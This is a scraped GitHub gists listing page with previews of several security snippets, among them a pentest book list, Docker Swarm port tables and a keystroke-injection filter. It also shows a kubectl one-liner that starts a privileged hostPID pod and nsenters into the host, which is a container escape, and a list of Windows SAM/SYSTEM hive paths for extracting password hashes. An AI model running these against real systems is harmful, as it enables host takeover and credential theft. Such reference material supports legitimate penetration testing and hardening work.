Skip to content

Instantly share code, notes, and snippets.


Ian Coldwater IanColdwater

  • Minneapolis, MN
View GitHub Profile
kubectl run hack1 --restart=Never -t -i -n kube-system --image overridden --overrides '{"spec":{"hostPID": true, "containers":[{"name":"busybox","image":"alpine:3.7","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}' --rm --attach
FrankSpierings /
Last active Sep 19, 2022
Linux Container Escapes and Hardening
View gist:606c41ac6ec40bf5c69d4db96d9312e3
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
staaldraad / ioctlfilter.c
Created Mar 21, 2017
Filters keycodes from R400 presenter in Linux
View ioctlfilter.c
/* Grabs all input from Logitech R400 presenter and filters to ensure only certain keys are pressed.
* Ensures that only valid R400 keys are pressed and not rogue keys injected.
* Main logic for this found here:
* Author: Etienne Stalmans <>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
BretFisher /
Last active Dec 4, 2022
Docker Swarm Port Requirements, both Swarm Mode 1.12+ and Swarm Classic, plus AWS Security Group Style Tables

Docker Swarm Mode Ports

Starting with 1.12 in July 2016, Docker Swarm Mode is a built-in solution with built-in key/value store. Easier to get started, and fewer ports to configure.

Inbound Traffic for Swarm Management

  • TCP port 2377 for cluster management & raft sync communications
  • TCP and UDP port 7946 for "control plane" gossip discovery communication between all nodes
  • UDP port 4789 for "data plane" VXLAN overlay network traffic
  • IP Protocol 50 (ESP) if you plan on using overlay network with the encryption option

AWS Security Group Example

sckalath / windows_blind
Created Jul 14, 2014
Windows Blind Files
View windows_blind
%WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system.
%SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.